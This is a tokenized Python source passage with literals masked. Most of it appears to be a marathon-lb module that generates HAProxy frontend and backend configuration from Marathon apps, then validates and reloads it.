<NUM_LIT:0> : <EOL> if len ( collected_logs ) > <NUM_LIT:10> : <EOL> print ( '<STR_LIT>' ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> for log in collected_logs [ : <NUM_LIT:10> ] : <EOL> lines = log . splitlines ( ) <EOL> if len ( lines ) > <NUM_LIT:100> : <EOL> print ( lines [ <NUM_LIT:0> ] ) <EOL> print ( '<STR_LIT>' ) <EOL> lines = lines [ - <NUM_LIT> : ] <EOL> for line in lines : <EOL> print ( line ) <EOL> print ( '<STR_LIT>' % logfilename ) <EOL> return error_count <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> sys . exit ( run ( sys . argv [ <NUM_LIT:1> : ] ) ) </s>
<s> import sys <EOL> if sys . argv [ <NUM_LIT:1> ] == '<STR_LIT>' : <EOL> print ( '<STR_LIT>' ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> print ( '<STR_LIT>' , sys . argv [ <NUM_LIT:1> ] ) <EOL> sys . exit ( <NUM_LIT:1> ) </s>
<s> """<STR_LIT>""" <EOL> from operator import attrgetter <EOL> from shutil import move <EOL> from tempfile import mkstemp <EOL> from wsgiref . simple_server import make_server <EOL> from six . moves . urllib import parse <EOL> from itertools import cycle <EOL> from common import * <EOL> from config import * <EOL> from lrucache import * <EOL> from utils import * <EOL> import argparse <EOL> import json <EOL> import logging <EOL> import os <EOL> import os . path <EOL> import stat <EOL> import re <EOL> import requests <EOL> import shlex <EOL> import subprocess <EOL> import sys <EOL> import time <EOL> import dateutil . parser <EOL> import threading <EOL> import traceback <EOL> import random <EOL> import hashlib <EOL> logger = logging . getLogger ( '<STR_LIT>' ) <EOL> SERVICE_PORT_ASSIGNER = ServicePortAssigner ( ) <EOL> class MarathonBackend ( object ) : <EOL> def __init__ ( self , host , ip , port , draining ) : <EOL> self . host = host <EOL> """<STR_LIT>""" <EOL> self . ip = ip <EOL> """<STR_LIT>""" <EOL> self . port = port <EOL> """<STR_LIT>""" <EOL> self . draining = draining <EOL> """<STR_LIT>""" <EOL> def __hash__ ( self ) : <EOL> return hash ( ( self . host , self . port ) ) <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . host , self . ip , self . port ) <EOL> class MarathonService ( object ) : <EOL> def __init__ ( self , appId , servicePort , healthCheck ) : <EOL> self . appId = appId <EOL> self . servicePort = servicePort <EOL> self . backends = set ( ) <EOL> self . hostname = None <EOL> self . proxypath = None <EOL> self . revproxypath = None <EOL> self . redirpath = None <EOL> self . haproxy_groups = frozenset ( ) <EOL> self . path = None <EOL> self . authRealm = None <EOL> self . authUser = None <EOL> self . authPasswd = None <EOL> self . sticky = False <EOL> self . redirectHttpToHttps = False <EOL> self . useHsts = False <EOL> self . sslCert = None <EOL> self . bindOptions = None <EOL> self . bindAddr = '<STR_LIT:*>' <EOL> self . groups = frozenset ( ) <EOL> self . mode = '<STR_LIT>' <EOL> self . balance = '<STR_LIT>' <EOL> self . healthCheck = healthCheck <EOL> self . labels = { } <EOL> self . backend_weight = <NUM_LIT:0> <EOL> if healthCheck : <EOL> if healthCheck [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> self . mode = '<STR_LIT:http>' <EOL> def add_backend ( self , host , ip , port , draining ) : <EOL> self . backends . add ( MarathonBackend ( host , ip , port , draining ) ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . servicePort ) <EOL> def __eq__ ( self , other ) : <EOL> return self . servicePort == other . servicePort <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % ( self . appId , self . servicePort ) <EOL> class MarathonApp ( object ) : <EOL> def __init__ ( self , marathon , appId , app ) : <EOL> self . app = app <EOL> self . groups = frozenset ( ) <EOL> self . appId = appId <EOL> self . services = dict ( ) <EOL> def __hash__ ( self ) : <EOL> return hash ( self . appId ) <EOL> def __eq__ ( self , other ) : <EOL> return self . appId == other . appId <EOL> class Marathon ( object ) : <EOL> def __init__ ( self , hosts , health_check , auth ) : <EOL> self . __hosts = hosts <EOL> self . __health_check = health_check <EOL> self . __auth = auth <EOL> self . __cycle_hosts = cycle ( self . __hosts ) <EOL> def api_req_raw ( self , method , path , auth , body = None , ** kwargs ) : <EOL> for host in self . __hosts : <EOL> path_str = os . path . join ( host , '<STR_LIT>' ) <EOL> for path_elem in path : <EOL> path_str = path_str + "<STR_LIT:/>" + path_elem <EOL> response = requests . request ( <EOL> method , <EOL> path_str , <EOL> auth = auth , <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT:application/json>' , <EOL> '<STR_LIT:Content-Type>' : '<STR_LIT:application/json>' <EOL> } , <EOL> ** kwargs <EOL> ) <EOL> logger . debug ( "<STR_LIT>" , method , response . url ) <EOL> if response . status_code == <NUM_LIT:200> : <EOL> break <EOL> if '<STR_LIT:message>' in response . json ( ) : <EOL> response . reason = "<STR_LIT>" % ( <EOL> response . reason , <EOL> response . json ( ) [ '<STR_LIT:message>' ] ) <EOL> response . raise_for_status ( ) <EOL> return response <EOL> def api_req ( self , method , path , ** kwargs ) : <EOL> return self . api_req_raw ( method , path , self . __auth , ** kwargs ) . json ( ) <EOL> def create ( self , app_json ) : <EOL> return self . api_req ( '<STR_LIT:POST>' , [ '<STR_LIT>' ] , app_json ) <EOL> def get_app ( self , appid ) : <EOL> logger . info ( '<STR_LIT>' , appid ) <EOL> return self . api_req ( '<STR_LIT:GET>' , [ '<STR_LIT>' , appid ] ) [ "<STR_LIT>" ] <EOL> def list ( self ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return self . api_req ( '<STR_LIT:GET>' , [ '<STR_LIT>' ] , <EOL> params = { '<STR_LIT>' : '<STR_LIT>' } ) [ "<STR_LIT>" ] <EOL> def health_check ( self ) : <EOL> return self . __health_check <EOL> def tasks ( self ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> return self . api_req ( '<STR_LIT:GET>' , [ '<STR_LIT>' ] ) [ "<STR_LIT>" ] <EOL> def add_subscriber ( self , callbackUrl ) : <EOL> return self . api_req ( <EOL> '<STR_LIT:POST>' , <EOL> [ '<STR_LIT>' ] , <EOL> params = { '<STR_LIT>' : callbackUrl } ) <EOL> def remove_subscriber ( self , callbackUrl ) : <EOL> return self . api_req ( <EOL> '<STR_LIT>' , <EOL> [ '<STR_LIT>' ] , <EOL> params = { '<STR_LIT>' : callbackUrl } ) <EOL> def get_event_stream ( self ) : <EOL> url = self . host + "<STR_LIT>" <EOL> logger . info ( <EOL> "<STR_LIT>" . format ( url ) ) <EOL> headers = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> resp = requests . get ( url , stream = True , <EOL> headers = headers , auth = self . __auth ) <EOL> class Event ( object ) : <EOL> def __init__ ( self , data ) : <EOL> self . data = data <EOL> for line in resp . iter_lines ( ) : <EOL> if line . strip ( ) != '<STR_LIT>' : <EOL> for real_event_data in re . split ( r'<STR_LIT:\r\n>' , <EOL> line . decode ( '<STR_LIT:utf-8>' ) ) : <EOL> if real_event_data [ : <NUM_LIT:6> ] == "<STR_LIT>" : <EOL> event = Event ( data = real_event_data [ <NUM_LIT:6> : ] ) <EOL> yield event <EOL> @ property <EOL> def host ( self ) : <EOL> return next ( self . __cycle_hosts ) <EOL> def has_group ( groups , app_groups ) : <EOL> if '<STR_LIT:*>' in groups : <EOL> return True <EOL> if len ( groups ) == <NUM_LIT:0> and len ( app_groups ) == <NUM_LIT:0> : <EOL> raise Exception ( "<STR_LIT>" ) <EOL> if ( len ( frozenset ( app_groups ) & groups ) ) : <EOL> return True <EOL> return False <EOL> def config ( apps , groups , bind_http_https , ssl_certs , templater ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> config = templater . haproxy_head <EOL> groups = frozenset ( groups ) <EOL> _ssl_certs = ssl_certs or "<STR_LIT>" <EOL> _ssl_certs = _ssl_certs . split ( "<STR_LIT:U+002C>" ) <EOL> if bind_http_https : <EOL> http_frontends = templater . haproxy_http_frontend_head <EOL> https_frontends = templater . haproxy_https_frontend_head . format ( <EOL> sslCerts = "<STR_LIT:U+0020>" . join ( map ( lambda cert : "<STR_LIT>" + cert , _ssl_certs ) ) <EOL> ) <EOL> userlists = str ( ) <EOL> frontends = str ( ) <EOL> backends = str ( ) <EOL> http_appid_frontends = templater . haproxy_http_frontend_appid_head <EOL> apps_with_http_appid_backend = [ ] <EOL> http_frontend_list = [ ] <EOL> https_frontend_list = [ ] <EOL> for app in sorted ( apps , key = attrgetter ( '<STR_LIT>' , '<STR_LIT>' ) ) : <EOL> if app . haproxy_groups : <EOL> if not has_group ( groups , app . haproxy_groups ) : <EOL> continue <EOL> else : <EOL> if not has_group ( groups , app . groups ) : <EOL> continue <EOL> logger . debug ( "<STR_LIT>" , app . appId ) <EOL> backend = app . appId [ <NUM_LIT:1> : ] . replace ( '<STR_LIT:/>' , '<STR_LIT:_>' ) + '<STR_LIT:_>' + str ( app . servicePort ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> app . bindAddr , app . servicePort , backend ) <EOL> if app . hostname : <EOL> app . mode = '<STR_LIT:http>' <EOL> if app . authUser : <EOL> userlist_head = templater . haproxy_userlist_head ( app ) <EOL> userlists += userlist_head . format ( <EOL> backend = backend , <EOL> user = app . authUser , <EOL> passwd = app . authPasswd <EOL> ) <EOL> frontend_head = templater . haproxy_frontend_head ( app ) <EOL> frontends += frontend_head . format ( <EOL> bindAddr = app . bindAddr , <EOL> backend = backend , <EOL> servicePort = app . servicePort , <EOL> mode = app . mode , <EOL> sslCert = '<STR_LIT>' + app . sslCert if app . sslCert else '<STR_LIT>' , <EOL> bindOptions = '<STR_LIT:U+0020>' + app . bindOptions if app . bindOptions else '<STR_LIT>' <EOL> ) <EOL> backend_head = templater . haproxy_backend_head ( app ) <EOL> backends += backend_head . format ( <EOL> backend = backend , <EOL> balance = app . balance , <EOL> mode = app . mode <EOL> ) <EOL> if bind_http_https and app . hostname : <EOL> backend_weight , p_fe , s_fe = generateHttpVhostAcl ( templater , <EOL> app , <EOL> backend ) <EOL> http_frontend_list . append ( ( backend_weight , p_fe ) ) <EOL> https_frontend_list . append ( ( backend_weight , s_fe ) ) <EOL> if app . mode == '<STR_LIT:http>' and app . appId not in apps_with_http_appid_backend : <EOL> logger . debug ( "<STR_LIT>" , app . appId ) <EOL> apps_with_http_appid_backend += [ app . appId ] <EOL> cleanedUpAppId = re . sub ( r'<STR_LIT>' , '<STR_LIT:_>' , app . appId ) <EOL> http_appid_frontend_acl = templater . haproxy_http_frontend_appid_acl ( app ) <EOL> http_appid_frontends += http_appid_frontend_acl . format ( <EOL> cleanedUpAppId = cleanedUpAppId , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> if app . mode == '<STR_LIT:http>' : <EOL> if app . useHsts : <EOL> backends += templater . haproxy_backend_hsts_options ( app ) <EOL> backends += templater . haproxy_backend_http_options ( app ) <EOL> backend_http_backend_proxypass = templater . haproxy_http_backend_proxypass ( app ) <EOL> if app . proxypath : <EOL> backends += backend_http_backend_proxypass . format ( <EOL> hostname = app . hostname , <EOL> proxypath = app . proxypath <EOL> ) <EOL> backend_http_backend_revproxy = templater . haproxy_http_backend_revproxy ( app ) <EOL> if app . revproxypath : <EOL> backends += backend_http_backend_revproxy . format ( <EOL> hostname = app . hostname , <EOL> rootpath = app . revproxypath <EOL> ) <EOL> backend_http_backend_redir = templater . haproxy_http_backend_redir ( app ) <EOL> if app . redirpath : <EOL> backends += backend_http_backend_redir . format ( <EOL> hostname = app . hostname , <EOL> redirpath = app . redirpath <EOL> ) <EOL> if app . healthCheck : <EOL> health_check_options = None <EOL> if app . mode == '<STR_LIT>' or app . healthCheck [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> health_check_options = templater . haproxy_backend_tcp_healthcheck_options ( app ) <EOL> elif app . mode == '<STR_LIT:http>' : <EOL> health_check_options = templater . haproxy_backend_http_healthcheck_options ( app ) <EOL> if health_check_options : <EOL> healthCheckPort = app . healthCheck . get ( '<STR_LIT:port>' ) <EOL> backends += health_check_options . format ( <EOL> healthCheck = app . healthCheck , <EOL> healthCheckPortIndex = app . healthCheck . get ( '<STR_LIT>' ) , <EOL> healthCheckPort = healthCheckPort , <EOL> healthCheckProtocol = app . healthCheck [ '<STR_LIT>' ] , <EOL> healthCheckPath = app . healthCheck . get ( '<STR_LIT:path>' , '<STR_LIT:/>' ) , <EOL> healthCheckTimeoutSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckIntervalSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckIgnoreHttp1xx = app . healthCheck [ '<STR_LIT>' ] , <EOL> healthCheckGracePeriodSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckMaxConsecutiveFailures = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckFalls = app . healthCheck [ <EOL> '<STR_LIT>' ] + <NUM_LIT:1> , <EOL> healthCheckPortOptions = '<STR_LIT>' + <EOL> str ( healthCheckPort ) if healthCheckPort else '<STR_LIT>' <EOL> ) <EOL> if app . sticky : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> backends += templater . haproxy_backend_sticky_options ( app ) <EOL> frontend_backend_glue = templater . haproxy_frontend_backend_glue ( app ) <EOL> frontends += frontend_backend_glue . format ( backend = backend ) <EOL> key_func = attrgetter ( '<STR_LIT:host>' , '<STR_LIT:port>' ) <EOL> for backendServer in sorted ( app . backends , key = key_func ) : <EOL> logger . debug ( <EOL> "<STR_LIT>" , <EOL> backendServer . ip , <EOL> backendServer . port , <EOL> backendServer . host ) <EOL> if backendServer . host != backendServer . ip : <EOL> serverName = re . sub ( <EOL> r'<STR_LIT>' , '<STR_LIT:_>' , <EOL> ( backendServer . host + '<STR_LIT:_>' + <EOL> backendServer . ip + '<STR_LIT:_>' + <EOL> str ( backendServer . port ) ) ) <EOL> else : <EOL> serverName = re . sub ( <EOL> r'<STR_LIT>' , '<STR_LIT:_>' , <EOL> ( backendServer . ip + '<STR_LIT:_>' + <EOL> str ( backendServer . port ) ) ) <EOL> shortHashedServerName = hashlib . sha1 ( serverName . encode ( ) ) . hexdigest ( ) [ : <NUM_LIT:10> ] <EOL> healthCheckOptions = None <EOL> if app . healthCheck : <EOL> server_health_check_options = None <EOL> if app . mode == '<STR_LIT>' or app . healthCheck [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> server_health_check_options = templater . haproxy_backend_server_tcp_healthcheck_options ( app ) <EOL> elif app . mode == '<STR_LIT:http>' : <EOL> server_health_check_options = templater . haproxy_backend_server_http_healthcheck_options ( app ) <EOL> if server_health_check_options : <EOL> healthCheckPort = app . healthCheck . get ( '<STR_LIT:port>' ) <EOL> healthCheckOptions = server_health_check_options . format ( <EOL> healthCheck = app . healthCheck , <EOL> healthCheckPortIndex = app . healthCheck . get ( '<STR_LIT>' ) , <EOL> healthCheckPort = healthCheckPort , <EOL> healthCheckProtocol = app . healthCheck [ '<STR_LIT>' ] , <EOL> healthCheckPath = app . healthCheck . get ( '<STR_LIT:path>' , '<STR_LIT:/>' ) , <EOL> healthCheckTimeoutSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckIntervalSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckIgnoreHttp1xx = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckGracePeriodSeconds = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckMaxConsecutiveFailures = app . healthCheck [ <EOL> '<STR_LIT>' ] , <EOL> healthCheckFalls = app . healthCheck [ <EOL> '<STR_LIT>' ] + <NUM_LIT:1> , <EOL> healthCheckPortOptions = '<STR_LIT>' + <EOL> str ( healthCheckPort ) if healthCheckPort else '<STR_LIT>' <EOL> ) <EOL> backend_server_options = templater . haproxy_backend_server_options ( app ) <EOL> backends += backend_server_options . format ( <EOL> host = backendServer . host , <EOL> host_ipv4 = backendServer . ip , <EOL> port = backendServer . port , <EOL> serverName = serverName , <EOL> cookieOptions = '<STR_LIT>' + <EOL> shortHashedServerName if app . sticky else '<STR_LIT>' , <EOL> healthCheckOptions = healthCheckOptions <EOL> if healthCheckOptions else '<STR_LIT>' , <EOL> otherOptions = '<STR_LIT>' if backendServer . draining else '<STR_LIT>' <EOL> ) <EOL> http_frontend_list . sort ( key = lambda x : x [ <NUM_LIT:0> ] , reverse = True ) <EOL> https_frontend_list . sort ( key = lambda x : x [ <NUM_LIT:0> ] , reverse = True ) <EOL> for backend in http_frontend_list : <EOL> http_frontends += backend [ <NUM_LIT:1> ] <EOL> for backend in https_frontend_list : <EOL> https_frontends += backend [ <NUM_LIT:1> ] <EOL> config += userlists <EOL> if bind_http_https : <EOL> config += http_frontends <EOL> config += http_appid_frontends <EOL> if bind_http_https : <EOL> config += https_frontends <EOL> config += frontends <EOL> config += backends <EOL> return config <EOL> def get_haproxy_pids ( ) : <EOL> try : <EOL> return subprocess . check_output ( <EOL> "<STR_LIT>" , <EOL> stderr = subprocess . STDOUT , <EOL> shell = True ) <EOL> except subprocess . CalledProcessError as ex : <EOL> return '<STR_LIT>' <EOL> def reloadConfig ( ) : <EOL> reloadCommand = [ ] <EOL> if args . command : <EOL> reloadCommand = shlex . split ( args . command ) <EOL> else : <EOL> logger . debug ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> if os . path . isfile ( '<STR_LIT>' ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> reloadCommand = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> elif ( os . path . isfile ( '<STR_LIT>' ) or <EOL> os . path . isfile ( '<STR_LIT>' ) ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> reloadCommand = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> elif os . path . isfile ( '<STR_LIT>' ) : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> reloadCommand = [ '<STR_LIT>' , '<STR_LIT>' ] <EOL> else : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> reloadCommand = None <EOL> if reloadCommand : <EOL> logger . info ( "<STR_LIT>" , "<STR_LIT:U+0020>" . join ( reloadCommand ) ) <EOL> try : <EOL> start_time = time . time ( ) <EOL> pids = get_haproxy_pids ( ) <EOL> subprocess . check_call ( reloadCommand , close_fds = True ) <EOL> while pids == get_haproxy_pids ( ) : <EOL> time . sleep ( <NUM_LIT:0.1> ) <EOL> logger . debug ( "<STR_LIT>" , <EOL> time . time ( ) - start_time ) <EOL> except OSError as ex : <EOL> logger . error ( "<STR_LIT>" , <EOL> "<STR_LIT:U+0020>" . join ( reloadCommand ) ) <EOL> logger . error ( "<STR_LIT>" , ex ) <EOL> except subprocess . CalledProcessError as ex : <EOL> logger . error ( "<STR_LIT>" , <EOL> "<STR_LIT:U+0020>" . join ( reloadCommand ) ) <EOL> logger . error ( "<STR_LIT>" , ex ) <EOL> def generateHttpVhostAcl ( templater , app , backend ) : <EOL> staging_http_frontends = "<STR_LIT>" <EOL> staging_https_frontends = "<STR_LIT>" <EOL> if "<STR_LIT:U+002C>" in app . hostname : <EOL> logger . debug ( <EOL> "<STR_LIT>" , app . hostname ) <EOL> vhosts = app . hostname . split ( '<STR_LIT:U+002C>' ) <EOL> acl_name = re . sub ( r'<STR_LIT>' , '<STR_LIT:_>' , vhosts [ <NUM_LIT:0> ] ) + '<STR_LIT:_>' + app . appId [ <NUM_LIT:1> : ] . replace ( '<STR_LIT:/>' , '<STR_LIT:_>' ) <EOL> if app . path : <EOL> if app . authRealm : <EOL> logger . debug ( "<STR_LIT>" , app . path ) <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only_with_path_and_auth ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> path = app . path , <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhosts [ <NUM_LIT:0> ] , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_only_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> path = app . path , <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhosts [ <NUM_LIT:0> ] , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> logger . debug ( "<STR_LIT>" , app . path ) <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only_with_path ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> path = app . path , <EOL> backend = backend <EOL> ) <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_only_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> path = app . path , <EOL> backend = backend <EOL> ) <EOL> for vhost_hostname in vhosts : <EOL> logger . debug ( "<STR_LIT>" , vhost_hostname ) <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname <EOL> ) <EOL> if app . path : <EOL> if app . authRealm : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_auth_and_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> if app . authRealm : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_auth ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = vhost_hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> if app . redirectHttpToHttps : <EOL> logger . debug ( "<STR_LIT>" ) <EOL> if app . path : <EOL> haproxy_backend_redirect_http_to_https = templater . haproxy_backend_redirect_http_to_https_with_path ( app ) <EOL> frontend = haproxy_backend_redirect_http_to_https . format ( <EOL> bindAddr = app . bindAddr , <EOL> cleanedUpHostname = acl_name , <EOL> backend = backend <EOL> ) <EOL> staging_http_frontends += frontend <EOL> else : <EOL> haproxy_backend_redirect_http_to_https = templater . haproxy_backend_redirect_http_to_https ( app ) <EOL> frontend = haproxy_backend_redirect_http_to_https . format ( <EOL> bindAddr = app . bindAddr , <EOL> cleanedUpHostname = acl_name <EOL> ) <EOL> staging_http_frontends += frontend <EOL> elif app . path : <EOL> if app . authRealm : <EOL> http_frontend_route = templater . haproxy_http_frontend_routing_only_with_path_and_auth ( app ) <EOL> staging_http_frontends += http_frontend_route . format ( <EOL> cleanedUpHostname = acl_name , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> http_frontend_route = templater . haproxy_http_frontend_routing_only_with_path ( app ) <EOL> staging_http_frontends += http_frontend_route . format ( <EOL> cleanedUpHostname = acl_name , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> if app . authRealm : <EOL> http_frontend_route = templater . haproxy_http_frontend_routing_only_with_auth ( app ) <EOL> staging_http_frontends += http_frontend_route . format ( <EOL> cleanedUpHostname = acl_name , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> http_frontend_route = templater . haproxy_http_frontend_routing_only ( app ) <EOL> staging_http_frontends += http_frontend_route . format ( <EOL> cleanedUpHostname = acl_name , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> logger . debug ( <EOL> "<STR_LIT>" , app . hostname ) <EOL> acl_name = re . sub ( r'<STR_LIT>' , '<STR_LIT:_>' , app . hostname ) + '<STR_LIT:_>' + app . appId [ <NUM_LIT:1> : ] . replace ( '<STR_LIT:/>' , '<STR_LIT:_>' ) <EOL> if app . path : <EOL> if app . redirectHttpToHttps : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname <EOL> ) <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only_with_path ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> path = app . path , <EOL> backend = backend <EOL> ) <EOL> haproxy_backend_redirect_http_to_https = templater . haproxy_backend_redirect_http_to_https_with_path ( app ) <EOL> frontend = haproxy_backend_redirect_http_to_https . format ( <EOL> bindAddr = app . bindAddr , <EOL> cleanedUpHostname = acl_name , <EOL> backend = backend <EOL> ) <EOL> staging_http_frontends += frontend <EOL> else : <EOL> if app . authRealm : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_with_auth_and_path ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> path = app . path , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_with_path ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> path = app . path , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_only_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> path = app . path , <EOL> backend = backend <EOL> ) <EOL> if app . authRealm : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_auth_and_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> path = app . path , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_path ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> if app . redirectHttpToHttps : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_only ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname <EOL> ) <EOL> haproxy_backend_redirect_http_to_https = templater . haproxy_backend_redirect_http_to_https ( app ) <EOL> frontend = haproxy_backend_redirect_http_to_https . format ( <EOL> bindAddr = app . bindAddr , <EOL> cleanedUpHostname = acl_name <EOL> ) <EOL> staging_http_frontends += frontend <EOL> else : <EOL> if app . authRealm : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl_with_auth ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> http_frontend_acl = templater . haproxy_http_frontend_acl ( app ) <EOL> staging_http_frontends += http_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> if app . authRealm : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl_with_auth ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> realm = app . authRealm , <EOL> backend = backend <EOL> ) <EOL> else : <EOL> https_frontend_acl = templater . haproxy_https_frontend_acl ( app ) <EOL> staging_https_frontends += https_frontend_acl . format ( <EOL> cleanedUpHostname = acl_name , <EOL> hostname = app . hostname , <EOL> appId = app . appId , <EOL> backend = backend <EOL> ) <EOL> return ( app . backend_weight , <EOL> staging_http_frontends , <EOL> staging_https_frontends ) <EOL> def writeConfigAndValidate ( config , config_file ) : <EOL> if args . dry : <EOL> print ( config ) <EOL> sys . exit ( ) <EOL> fd , haproxyTempConfigFile = mkstemp ( ) <EOL> logger . debug ( "<STR_LIT>" , haproxyTempConfigFile ) <EOL> with os . fdopen ( fd , '<STR_LIT:w>' ) as haproxyTempConfig : <EOL> haproxyTempConfig . write ( config ) <EOL> perms = <NUM_LIT> <EOL> if os . path . isfile ( config_file ) : <EOL> perms = stat . S_IMODE ( os . lstat ( config_file ) . st_mode ) <EOL> os . chmod ( haproxyTempConfigFile , perms ) <EOL> if args . skip_validation : <EOL> logger . debug ( "<STR_LIT>" , <EOL> haproxyTempConfigFile , <EOL> config_file ) <EOL> move ( haproxyTempConfigFile , config_file ) <EOL> return True <EOL> cmd = [ '<STR_LIT>' , '<STR_LIT>' , haproxyTempConfigFile , '<STR_LIT:-c>' ] <EOL> logger . debug ( "<STR_LIT>" + str ( cmd ) ) <EOL> returncode = subprocess . call ( args = cmd ) <EOL> if returncode == <NUM_LIT:0> : <EOL> logger . debug ( "<STR_LIT>" , <EOL> haproxyTempConfigFile , <EOL> config_file ) <EOL> move ( haproxyTempConfigFile , config_file ) <EOL> return True <EOL> else : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return False <EOL> def 